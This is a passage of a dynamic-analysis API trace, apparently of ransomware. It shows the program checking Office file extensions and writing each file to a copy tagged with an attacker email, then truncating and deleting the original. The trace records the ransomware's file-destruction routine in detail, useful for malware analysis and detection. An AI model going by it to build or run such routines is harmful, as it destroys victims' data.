	[0149.719] lstrlenW (lpString=".rar") returned 4
	[0149.719] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.719] lstrlenW (lpString=".bz2") returned 4
	[0149.719] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.719] lstrlenW (lpString=".7z") returned 3
	[0149.719] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.719] lstrlenW (lpString=".dbf") returned 4
	[0149.719] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.719] lstrlenW (lpString=".1cd") returned 4
	[0149.719] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.720] lstrlenW (lpString=".jpg") returned 4
	[0149.720] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.720] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0149.720] lstrlenW (lpString="OUTLWVW.DLL.IDX_DLL") returned 19
	[0149.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.720] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=11136) returned 1
	[0149.720] CloseHandle (hObject=0x384) returned 1
	[0149.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.idx_dll")) returned 0x20
	[0149.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.721] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.721] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.722] GetLastError () returned 0x0
	[0149.722] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2b80, lpOverlapped=0x0) returned 1
	[0149.733] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2b90, lpOverlapped=0x0) returned 1
	[0149.734] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.734] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0149.734] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.734] CloseHandle (hObject=0x3ec) returned 1
	[0149.734] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.735] SetEndOfFile (hFile=0x384) returned 1
	[0149.737] CloseHandle (hObject=0x384) returned 1
	[0149.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.737] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.idx_dll")) returned 1
	[0149.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.738] lstrlenW (lpString=".doc") returned 4
	[0149.738] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString=".docx") returned 5
	[0149.738] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.738] lstrlenW (lpString=".pdf") returned 4
	[0149.738] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString=".xls") returned 4
	[0149.738] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString=".xlsx") returned 5
	[0149.738] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.738] lstrlenW (lpString=".ppt") returned 4
	[0149.738] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.738] lstrlenW (lpString=".zip") returned 4
	[0149.738] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString=".rar") returned 4
	[0149.738] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString=".bz2") returned 4
	[0149.738] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString=".7z") returned 3
	[0149.738] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.738] lstrlenW (lpString=".dbf") returned 4
	[0149.738] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.739] lstrlenW (lpString=".1cd") returned 4
	[0149.739] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.739] lstrlenW (lpString=".jpg") returned 4
	[0149.739] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.739] lstrlenW (lpString=".doc") returned 4
	[0149.739] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString=".docx") returned 5
	[0149.739] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.739] lstrlenW (lpString=".pdf") returned 4
	[0149.739] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString=".xls") returned 4
	[0149.739] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString=".xlsx") returned 5
	[0149.739] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.739] lstrlenW (lpString=".ppt") returned 4
	[0149.739] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.739] lstrlenW (lpString=".zip") returned 4
	[0149.739] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString=".rar") returned 4
	[0149.739] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString=".bz2") returned 4
	[0149.739] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.739] lstrlenW (lpString=".7z") returned 3
	[0149.739] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.739] lstrlenW (lpString=".dbf") returned 4
	[0149.739] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.740] lstrlenW (lpString=".1cd") returned 4
	[0149.740] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.IDX_DLL") returned 67
	[0149.740] lstrlenW (lpString=".jpg") returned 4
	[0149.740] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.740] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0149.740] lstrlenW (lpString="PE.VSL") returned 6
	[0149.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.751] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=84352) returned 1
	[0149.751] CloseHandle (hObject=0x384) returned 1
	[0149.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl")) returned 0x20
	[0149.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.752] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.752] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.752] GetLastError () returned 0x0
	[0149.752] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x14980, lpOverlapped=0x0) returned 1
	[0149.809] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x14990, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x14990, lpOverlapped=0x0) returned 1
	[0149.811] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.811] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0149.811] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.812] CloseHandle (hObject=0x3ec) returned 1
	[0149.812] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.812] SetEndOfFile (hFile=0x384) returned 1
	[0149.819] CloseHandle (hObject=0x384) returned 1
	[0149.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.835] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl")) returned 1
	[0149.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.946] lstrlenW (lpString=".doc") returned 4
	[0149.946] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0149.946] lstrlenW (lpString=".docx") returned 5
	[0149.946] lstrcmpiW (lpString1=".docx", lpString2="E.VSL") returned -1
	[0149.946] lstrlenW (lpString=".pdf") returned 4
	[0149.946] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0149.946] lstrlenW (lpString=".xls") returned 4
	[0149.946] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0149.946] lstrlenW (lpString=".xlsx") returned 5
	[0149.946] lstrcmpiW (lpString1=".xlsx", lpString2="E.VSL") returned -1
	[0149.946] lstrlenW (lpString=".ppt") returned 4
	[0149.946] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.947] lstrlenW (lpString=".zip") returned 4
	[0149.947] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0149.947] lstrlenW (lpString=".rar") returned 4
	[0149.947] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString=".bz2") returned 4
	[0149.947] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString=".7z") returned 3
	[0149.947] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0149.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.947] lstrlenW (lpString=".dbf") returned 4
	[0149.947] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.947] lstrlenW (lpString=".1cd") returned 4
	[0149.947] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.947] lstrlenW (lpString=".jpg") returned 4
	[0149.947] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.947] lstrlenW (lpString=".doc") returned 4
	[0149.947] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString=".docx") returned 5
	[0149.947] lstrcmpiW (lpString1=".docx", lpString2="E.VSL") returned -1
	[0149.947] lstrlenW (lpString=".pdf") returned 4
	[0149.947] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0149.947] lstrlenW (lpString=".xls") returned 4
	[0149.947] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0149.947] lstrlenW (lpString=".xlsx") returned 5
	[0149.947] lstrcmpiW (lpString1=".xlsx", lpString2="E.VSL") returned -1
	[0149.948] lstrlenW (lpString=".ppt") returned 4
	[0149.948] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0149.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.948] lstrlenW (lpString=".zip") returned 4
	[0149.948] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0149.948] lstrlenW (lpString=".rar") returned 4
	[0149.948] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0149.948] lstrlenW (lpString=".bz2") returned 4
	[0149.948] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0149.948] lstrlenW (lpString=".7z") returned 3
	[0149.948] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0149.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.948] lstrlenW (lpString=".dbf") returned 4
	[0149.948] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0149.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.948] lstrlenW (lpString=".1cd") returned 4
	[0149.948] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0149.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL") returned 54
	[0149.948] lstrlenW (lpString=".jpg") returned 4
	[0149.948] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0149.948] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0149.948] lstrlenW (lpString="PPINTL.REST.IDX_DLL") returned 19
	[0149.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0149.976] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=139648) returned 1
	[0149.976] CloseHandle (hObject=0x3b4) returned 1
	[0149.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.rest.idx_dll")) returned 0x20
	[0149.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.046] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.046] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.097] GetLastError () returned 0x0
	[0150.097] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x22180, lpOverlapped=0x0) returned 1
	[0150.108] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x22190, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x22190, lpOverlapped=0x0) returned 1
	[0150.111] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.111] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0150.111] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.111] CloseHandle (hObject=0x3e8) returned 1
	[0150.111] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.111] SetEndOfFile (hFile=0x3f0) returned 1
	[0150.115] CloseHandle (hObject=0x3f0) returned 1
	[0150.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.125] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.rest.idx_dll")) returned 1
	[0150.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.125] lstrlenW (lpString=".doc") returned 4
	[0150.125] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.125] lstrlenW (lpString=".docx") returned 5
	[0150.125] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.125] lstrlenW (lpString=".pdf") returned 4
	[0150.125] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.125] lstrlenW (lpString=".xls") returned 4
	[0150.126] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.126] lstrlenW (lpString=".xlsx") returned 5
	[0150.126] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.126] lstrlenW (lpString=".ppt") returned 4
	[0150.126] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.126] lstrlenW (lpString=".zip") returned 4
	[0150.126] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.126] lstrlenW (lpString=".rar") returned 4
	[0150.126] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.126] lstrlenW (lpString=".bz2") returned 4
	[0150.126] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.126] lstrlenW (lpString=".7z") returned 3
	[0150.126] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.126] lstrlenW (lpString=".dbf") returned 4
	[0150.126] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.126] lstrlenW (lpString=".1cd") returned 4
	[0150.126] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.127] lstrlenW (lpString=".jpg") returned 4
	[0150.127] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.127] lstrlenW (lpString=".doc") returned 4
	[0150.127] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString=".docx") returned 5
	[0150.127] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.127] lstrlenW (lpString=".pdf") returned 4
	[0150.127] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString=".xls") returned 4
	[0150.127] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString=".xlsx") returned 5
	[0150.127] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.127] lstrlenW (lpString=".ppt") returned 4
	[0150.127] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.127] lstrlenW (lpString=".zip") returned 4
	[0150.127] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString=".rar") returned 4
	[0150.127] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString=".bz2") returned 4
	[0150.127] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString=".7z") returned 3
	[0150.127] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
